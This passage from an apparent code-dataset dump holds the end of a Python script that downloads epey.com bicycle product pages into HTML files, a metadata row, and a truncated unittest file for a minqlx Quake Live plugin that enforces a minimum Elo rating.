'https://www.epey.com/bisiklet/peugeot-jm244.html'}, {'name': 'Corelli Smile 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-smile-20.html'}, {'name': 'Carraro Buffalo 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-buffalo-20.html'}, {'name': 'Carraro Elite 804 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-804.html'}, {'name': 'Ümit 1605 Little Pony Bisiklet', 'link': 
'https://www.epey.com/bisiklet/umit-1605-little-pony.html'}, {'name': 'Ümit 2400 Colorado Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2400-colorado.html'}, {'name': 'Kron CX50 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx50-26-v.html'}, {'name': 'Corelli Beauty 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-beauty-2-1.html'}, {'name': 'Corelli Snoop 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-2-2.html'}, {'name': 'Corelli Evol 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-evol-2-0.html'}, {'name': 'Salcano Excel 24 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-excel-24-lady.html'}, {'name': 'Corelli Apenin 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-apenin-1-0.html'}, {'name': 'Orbis Voltage 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-voltage-26.html'}, {'name': 'Mosso Groovy 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-29.html'}, {'name': 'Bianchi Aspid 36 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-36.html'}, {'name': 'Ümit 2864 Magnetic V Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2864-magnetic-v-lady.html'}, {'name': 'Cannondale F SI AL 3 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-f-si-al-3-27-5.html'}, {'name': 'Salcano Bodrum 26 Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-bodrum-26-man.html'}, {'name': 'Bianchi Energy D Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-energy-d-24.html'}, {'name': 'Ümit 2657 Albatros V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2657-albatros-v.html'}, {'name': 'Ümit 2012 Ben10 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2012-ben10.html'}, {'name': 'Ümit 2002 Z-Trend Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2002-z-trend.html'}, {'name': 'Mosso 29 WildFire LTD V Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-29-wildfire-ltd-v.html'}, {'name': 'Salcano 300 20 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-300-20-md.html'}, {'name': 'Salcano City Wind Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wind-lady-hd.html'}, {'name': 'Salcano NG444 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng444-27-5-hd.html'}, {'name': 'Carraro Daytona 927 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-927.html'}, {'name': 'Kron FD2100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd2100.html'}, {'name': 'Kron WRC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-wrc1000.html'}, {'name': 'Vortex 5.0 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/vortex-5-0-27-5.html'}, {'name': 'Kron XC75L 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc75l-20.html'}, {'name': 'Kron Vortex 4.0 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-vortex-4-0-26-v.html'}, {'name': 'Kron Anthea 3.0 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-anthea-3-0-20.html'}, {'name': 'Peugeot T16-28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-t16-28.html'}, {'name': 'Peugeot M15-26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-m15-26.html'}, {'name': 'Daafu SXC 100 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/daafu-sxc-100-20.html'}, {'name': 'Corelli Kickboy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-kickboy-20.html'}, {'name': 'Peugeot F13 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-f13.html'}, {'name': 'Carraro Elite 805 
Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-805.html'}, {'name': 'Carraro Force 920 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-force-920.html'}, {'name': 'Berg Jeep Adventure Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-jeep-adventure.html'}, {'name': 'Berg Buddy Orange Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-buddy-orange.html'}, {'name': 'Ümit 2019 Picolo Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2019-picolo.html'}, {'name': 'Ümit 2833 Ventura Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2833-ventura-lady.html'}, {'name': 'Ümit 2668 Faster V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2668-faster-v.html'}, {'name': 'Ümit 2960 Camaro HYD Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2960-camaro-hyd.html'}, {'name': 'Kron RF100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rf100-24-v.html'}, {'name': 'Sedona 240 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-240.html'}, {'name': 'Corelli Carmen 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-carmen-1-0.html'}, {'name': 'Corelli Swing 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-swing-2-0.html'}, {'name': 'Corelli Teton 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-teton-2-2.html'}, {'name': 'Bianchi Buffalo 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-buffalo-24.html'}, {'name': 'Carraro Juliana 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-juliana-26.html'}, {'name': 'Ghost Kato 5.7 AL Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-5-7-al.html'}, {'name': 'Bianchi Intenso Potenza Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-intenso-potenza.html'}, {'name': 'Salcano İmpetus 29 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-impetus-29-deore.html'}, {'name': 'Salcano NG400 27.5 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng400-27-5-lady-hd.html'}, {'name': 'Salcano NG750 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-26-lady-hd.html'}, {'name': 'Salcano NG800 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng800-24-lady-v.html'}, {'name': 'Salcano Lion FS Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-lion-fs.html'}, {'name': 'Salcano City Fun 50 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-fun-50-lady-hd.html'}, {'name': 'Salcano Marmaris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-marmaris.html'}, {'name': 'Salcano NG 800 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng-800-26-v.html'}, {'name': 'Corelli Terra 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-terra-1-0.html'}, {'name': 'Corelli Adonis 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-adonis-2-2.html'}, {'name': 'Corelli Jazz 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-jazz-1-2.html'}, {'name': 'Corelli Cyborg 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-cyborg-2-0.html'}, {'name': 'Corelli Scopri 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-scopri-2-0.html'}, {'name': 'Orbis Punkrose 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-punkrose-24.html'}, {'name': 'Orbis Tweety 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-tweety-16.html'}, {'name': 'Orbis Crazy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-crazy-20.html'}, {'name': 'Orbis Cloud 20 Bisiklet', 'link': 
'https://www.epey.com/bisiklet/orbis-cloud-20.html'}, {'name': 'Orbis Dynamic 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-dynamic-24.html'}, {'name': 'Orbis Escape 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-escape-24.html'}, {'name': 'Tern Verge S27H Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-verge-s27h.html'}, {'name': 'Dahon Briza D8 Bisiklet', 'link': 'https://www.epey.com/bisiklet/dahon-briza-d8.html'}, {'name': 'Kron XC100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-24-man-v.html'}, {'name': 'Kron TX150L Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-lady-v.html'}, {'name': 'Kron XC450 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc450-27-5-man-hd.html'}, {'name': 'Whistle Guipago 1830 Bisiklet', 'link': 'https://www.epey.com/bisiklet/whistle-guipago-1830.html'}, {'name': 'Mosso 20 WildFire V Boys Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-20-wildfire-v-boys.html'}, {'name': 'Mosso City Life Nexus Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-city-life-nexus-man.html'}, {'name': 'Mosso 771TB3 DMD Acera Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-771tb3-dmd-acera.html'}, {'name': 'Mosso 735TCA 105 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-735tca-105.html'}, {'name': 'Mosso Groovy 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-27-5.html'}, {'name': 'Ghost Kato 4 Kid 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-4-kid-24.html'}, {'name': 'Ghost Kato 2 Kid 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-2-kid-20.html'}, {'name': 'Ghost Lawu 2 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-lawu-2-26.html'}, {'name': 'Carraro Daytona 2924 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-2924.html'}, {'name': 'Carraro Flexi 103 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-flexi-103.html'}, {'name': 'Carraro Süngerbob 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sungerbob-20.html'}, {'name': 'Bianchi Bella 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-bella-24.html'}, {'name': 'Bianchi RCX 237 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-237.html'}, {'name': 'Bianchi Touring 411 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-411.html'}, {'name': 'Salcano Sarajevo 26 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-sarajevo-26-lady.html'}, {'name': 'Salcano NG450 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng450-26-lady-hd.html'}, {'name': 'Salcano City Sport 40 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-sport-40-v.html'}, {'name': 'Ümit 2049 Monster High Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2049-monster-high.html'}, {'name': 'Cube Reaction GTC Race 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-reaction-gtc-race-27-5.html'}, {'name': 'Arbike 2901 Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2901.html'}, {'name': 'Arbike 2606 26 inç Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2606.html'}, {'name': 'Salcano NG350 29 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng350-hd-29.html'}, {'name': 'Salcano NG750 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-lady-24.html'}, {'name': 'Cube Delhi Pro Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-delhi-pro.html'}, {'name': 'Cube Attain Race Bisiklet', 'link': 
'https://www.epey.com/bisiklet/cube-attain-race.html'}, {'name': 'Cube Attain GTC SL Disk Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-gtc-sl-disk.html'}, {'name': 'Cube Acid 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-acid-27-5.html'}, {'name': 'Cube Agree C:62 SL Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-agree-c62-sl.html'}, {'name': 'Merida BIG.NINE XT Edition 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-nine-xt-edition-29.html'}, {'name': 'Merida BIG.SEVEN 1000 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-seven-1000-27-5.html'}, {'name': 'Trek Superfly 5 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/trek-superfly-5-29.html'}, {'name': 'Geotech Manic Carbon 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-manic-carbon-29.html'}, {'name': 'Corratec Superbow Fun 29ER 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-superbow-fun-29er-29.html'}, {'name': 'Corratec Dolomiti Sora 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-dolomiti-sora-28.html'}, {'name': 'Cannondale Supersix Evo Ultegra Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-supersix-evo-ultegra-4-28.html'}, {'name': 'Cannondale Bad Boy 4 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-bad-boy-4-28.html'}, {'name': 'Cannondale Trail Womens 5 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-trail-womens-5-27-5.html'}, {'name': 'Schwinn Searcher 3 Men 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/schwinn-searcher-3-men-28.html'}, {'name': 'Geotech Path XC 4.4 20. Yil özel Seri 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-path-xc-4-4-20-yil-ozel-seri-26.html'}, {'name': 'Kron XC250 Lady 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc250-lady-26.html'}, {'name': 'Kron TX150 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-hd.html'}, {'name': 'Salcano Igman 27.5 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-igman-deore-27-5.html'}, {'name': 'Salcano Astro 29 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-astro-v-29.html'}, {'name': 'Salcano City Wings 20 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wings-20-hd.html'}, {'name': 'Salcano XRS050 Claris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-xrs050-claris.html'}, {'name': 'Salcano Tracker 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-tracker-20.html'}, {'name': 'Salcano Cappadocia Steel Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-cappadocia-steel.html'}, {'name': 'Salcano Assos 20 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-20-x1-29.html'}, {'name': 'Salcano Assos 10 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-10-x1-29.html'}, {'name': 'Scott Contessa 640 Bisiklet', 'link': 'https://www.epey.com/bisiklet/scott-contessa-640-26.html'}, {'name': 'Tern Link B7 Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-link-b7-20.html'}, {'name': 'Bianchi Honey Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-honey-16.html'}, {'name': 'Bianchi Touring 405 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-405-bayan-28.html'}, {'name': 'Bianchi AFX 7029 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-afx-7029-29.html'}, {'name': 'Bianchi RCX 426 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-426-26.html'}, {'name': 'Bianchi Nitro Bisiklet', 'link': 
'https://www.epey.com/bisiklet/bianchi-nitro-24.html'}, {'name': 'Carraro Sportive 327 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sportive-327-28.html'}, {'name': 'Carraro Street 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-street-26.html'}, {'name': 'Carraro Big 629 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-big-629-29.html'}, {'name': 'Carraro Crs 620 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-crs-620-26.html'}, {'name': 'Sedona Black Code 8 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-black-code-8-27-5.html'}, {'name': 'Coranna 2491 Castor Bisiklet', 'link': 'https://www.epey.com/bisiklet/coranna-2491-castor.html'}, {'name': "Ümit 2842 City's Bisiklet", 'link': 'https://www.epey.com/bisiklet/umit-2842-citys-2842-citys.html'}, {'name': 'Ümit 2411 Rideon Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2411-rideon.html'}, {'name': 'Ümit 2056 Accrue 2D 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2056-accrue-2d-20.html'}, {'name': 'Ümit 1671 Superbomber 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1671-superbomber-16.html'}, {'name': 'Ümit 2802 Taurus Man 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2802-taurus-man-28.html'}, {'name': 'Ümit 2053 Thunder 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2053-thunder-20.html'}, {'name': 'Ümit 2965 Mirage V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2965-mirage-v.html'}, {'name': 'Gitane Fast Bisiklet', 'link': 'https://www.epey.com/bisiklet/gitane-fast.html'}, {'name': 'Carraro Kifuka 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-kifuka-27-5.html'}]
for i in bicycles:
    url = i['link']
    try:
        # Send a browser-like User-Agent so the site does not reject the request.
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()
    except Exception:
        print("err in " + i['link'])
    else:
        print("Downloaded " + i['name'] + " ", end="\r")
        # Product names may contain '/', which is invalid in file names.
        fileName = i['name'].replace('/', '_')
        with open("./listItems/" + fileName + '.html', 'wb') as f:
            f.write(webpage)  # the original's bare `f.close` never closed the file
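A minimal hardened variant of the download loop above, assuming the same `bicycles` list and the `urllib.request` imports already in use; the retry count, timeout, and delays are illustrative choices, not part of the original script:

import os
import time
from urllib.request import Request, urlopen

os.makedirs("./listItems", exist_ok=True)
for item in bicycles:
    req = Request(item['link'], headers={'User-Agent': 'Mozilla/5.0'})
    for attempt in range(3):  # retry transient network failures up to 3 times
        try:
            webpage = urlopen(req, timeout=10).read()
        except Exception:
            time.sleep(2 ** attempt)  # back off 1s, 2s, 4s before retrying
        else:
            fileName = item['name'].replace('/', '_')
            with open("./listItems/" + fileName + '.html', 'wb') as f:
                f.write(webpage)
            break
    time.sleep(0.5)  # brief pause between products to be polite to the server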
| 906.181818 | 19,356 | 0.688353 | 3,085 | 19,936 | 4.448622 | 0.117018 | 0.158263 | 0.224206 | 0.263772 | 0.660376 | 0.596692 | 0.573739 | 0.554212 | 0.328111 | 0.141504 | 0 | 0.059336 | 0.078551 | 19,936 | 21 | 19,357 | 949.333333 | 0.687643 | 0 | 0 | 0 | 0 | 2.555556 | 0.815601 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
868eb825011495edcc58f16f21e6e75e8ab1abc6
| 22,691 |
py
|
Python
|
src/unittest/python/merciful_elo_limit_tests.py
|
mgaertne/minqlx-plugin-tests
|
10a827fe063c86481560dcc00a8a3ce2ba60861b
|
[
"BSD-3-Clause"
] | 4 |
2017-11-01T04:49:27.000Z
|
2020-08-08T12:11:51.000Z
|
src/unittest/python/merciful_elo_limit_tests.py
|
mgaertne/minqlx-plugin-tests
|
10a827fe063c86481560dcc00a8a3ce2ba60861b
|
[
"BSD-3-Clause"
] | null | null | null |
src/unittest/python/merciful_elo_limit_tests.py
|
mgaertne/minqlx-plugin-tests
|
10a827fe063c86481560dcc00a8a3ce2ba60861b
|
[
"BSD-3-Clause"
] | 1 |
2021-04-26T09:04:36.000Z
|
2021-04-26T09:04:36.000Z
|
from minqlx_plugin_test import *
import logging
import unittest
from mockito import *
from mockito.matchers import *
from hamcrest import *
from redis import Redis
from merciful_elo_limit import *
class MercifulEloLimitTests(unittest.TestCase):

    def setUp(self):
        setup_plugin()
        setup_cvars({
            "qlx_mercifulelo_minelo": "800",
            "qlx_mercifulelo_applicationgames": "10",
            "qlx_mercifulelo_abovegames": "10",
            "qlx_mercifulelo_daysbanned": "30",
            "qlx_owner": "42"
        })
        setup_game_in_progress()
        self.plugin = merciful_elo_limit()
        self.reply_channel = mocked_channel()
        self.plugin.database = Redis
        self.db = mock(Redis)
        self.plugin._db_instance = self.db
        when(self.db).__getitem__(any).thenReturn("42")

    def tearDown(self):
        unstub()

    def setup_balance_ratings(self, player_elos):
        gametype = None
        if len(player_elos) > 0:
            gametype = self.plugin.game.type_short
        ratings = {}
        for player, elo in player_elos:
            ratings[player.steam_id] = {gametype: {'elo': elo}}
        self.plugin._loaded_plugins["balance"] = mock({'ratings': ratings})

    def setup_no_balance_plugin(self):
        if "balance" in self.plugin._loaded_plugins:
            del self.plugin._loaded_plugins["balance"]

    def setup_exception_list(self, players):
        mybalance_plugin = mock(Plugin)
        mybalance_plugin.exceptions = [player.steam_id for player in players]
        self.plugin._loaded_plugins["mybalance"] = mybalance_plugin

    def test_handle_map_change_resets_tracked_player_ids(self):
        connected_players()
        self.setup_balance_ratings([])
        self.plugin.tracked_player_sids = [123, 455]
        self.plugin.handle_map_change("campgrounds", "ca")
        assert_that(self.plugin.tracked_player_sids, is_([]))

    def test_handle_map_change_resets_announced_player_ids(self):
        connected_players()
        self.setup_balance_ratings([])
        self.plugin.announced_player_elos = [123, 455]
        self.plugin.handle_map_change("campgrounds", "ca")
        assert_that(self.plugin.announced_player_elos, is_([]))

    def test_handle_map_change_fetches_elos_of_connected_players(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 1200)})
        self.plugin.handle_map_change("thunderstruck", "ca")
        verify(self.plugin._loaded_plugins["balance"]).add_request(
            {player1.steam_id: 'ca', player2.steam_id: 'ca'},
            self.plugin.callback_ratings, CHAT_CHANNEL
        )

    def test_handle_player_connect_fetches_elo_of_connecting_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connecting_player = fake_player(789, "Connecting Player")
        connected_players(player1, player2, connecting_player)
        self.setup_balance_ratings({(player1, 900), (player2, 1200), (connecting_player, 1542)})
        self.plugin.handle_player_connect(connecting_player)
        verify(self.plugin._loaded_plugins["balance"]).add_request(
            {connecting_player.steam_id: 'ca'},
            self.plugin.callback_ratings, CHAT_CHANNEL
        )

    def test_fetch_elos_of_players_with_no_game_setup(self):
        setup_no_game()
        self.setup_balance_ratings({})
        self.plugin.fetch_elos_of_players([])
        verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)

    def test_fetch_elos_of_players_with_unsupported_gametype(self):
        setup_game_in_progress("unsupported")
        self.setup_balance_ratings({})
        self.plugin.fetch_elos_of_players([])
        verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)

    def test_fetch_elos_of_player_with_no_balance_plugin(self):
        mocked_logger = mock(spec=logging.Logger)
        spy2(minqlx.get_logger)
        when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger)
        self.setup_no_balance_plugin()
        self.plugin.fetch_elos_of_players([])
        verify(mocked_logger).warning(matches("Balance plugin not found.*"))

    def test_handle_round_countdown_with_no_game(self):
        setup_no_game()
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Speccing Player", team="spectator")
        connected_players(player1, player2, player3)
        self.setup_balance_ratings({})
        self.plugin.handle_round_countdown(1)
        verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)

    def test_handle_round_countdown_fetches_elos_of_players_in_teams(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Speccing Player", team="spectator")
        connected_players(player1, player2, player3)
        self.setup_balance_ratings({(player1, 900), (player2, 1200), (player3, 1600)})
        self.plugin.handle_round_countdown(4)
        verify(self.plugin._loaded_plugins["balance"]).add_request(
            {player1.steam_id: 'ca', player2.steam_id: 'ca'},
            self.plugin.callback_ratings, CHAT_CHANNEL
        )

    def test_callback_ratings_with_no_game_running(self):
        setup_no_game()
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Speccing Player", team="spectator")
        connected_players(player1, player2, player3)
        self.setup_balance_ratings({})
        self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL)
        verify(self.db, times=0).get(any)

    def test_callback_ratings_with_unsupported_game_type(self):
        setup_game_in_progress("unsupported")
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Speccing Player", team="spectator")
        connected_players(player1, player2, player3)
        self.setup_balance_ratings({})
        self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL)
        verify(self.db, times=0).get(any)

    def test_callback_ratings_warns_low_elo_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        patch(minqlx.next_frame, lambda func: func)
        patch(minqlx.thread, lambda func: func)
        patch(time.sleep, lambda int: None)
        when(self.db).get(any).thenReturn("2")
        self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
        verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*"))
        verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*"))

    def test_callback_ratings_announces_information_to_other_players(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        patch(minqlx.next_frame, lambda func: func)
        patch(minqlx.thread, lambda func: func)
        patch(time.sleep, lambda int: None)
        when(self.db).get(any).thenReturn("2")
        self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
        assert_plugin_sent_to_console(matches("Fake Player2.*is below.*, but has.*8.*application matches left.*"))

    def test_callback_ratings_announces_information_to_other_players_just_once_per_connect(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        self.plugin.announced_player_elos = [456]
        patch(minqlx.next_frame, lambda func: func)
        patch(minqlx.thread, lambda func: func)
        patch(time.sleep, lambda int: None)
        when(self.db).get(any).thenReturn("2")
        self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
        assert_plugin_sent_to_console(matches("Player.*is below.*, but has 8 application matches left.*"), times=0)

    def test_callback_ratings_makes_exception_for_player_in_exception_list(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Fake Player3", team="red")
        connected_players(player1, player2, player3)
        self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)})
        self.setup_exception_list([player3])
        patch(minqlx.next_frame, lambda func: func)
        patch(minqlx.thread, lambda func: func)
        patch(time.sleep, lambda int: None)
        when(self.db).get(any).thenReturn("2")
        self.plugin.callback_ratings([player1, player2, player3], minqlx.CHAT_CHANNEL)
        verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*"))
        verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*"))
        verify(player3, times=0).center_print(any)
        verify(player3, times=0).tell(any)

    def test_callback_ratings_warns_low_elo_player_when_application_games_not_set(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        patch(minqlx.next_frame, lambda func: func)
        patch(minqlx.thread, lambda func: func)
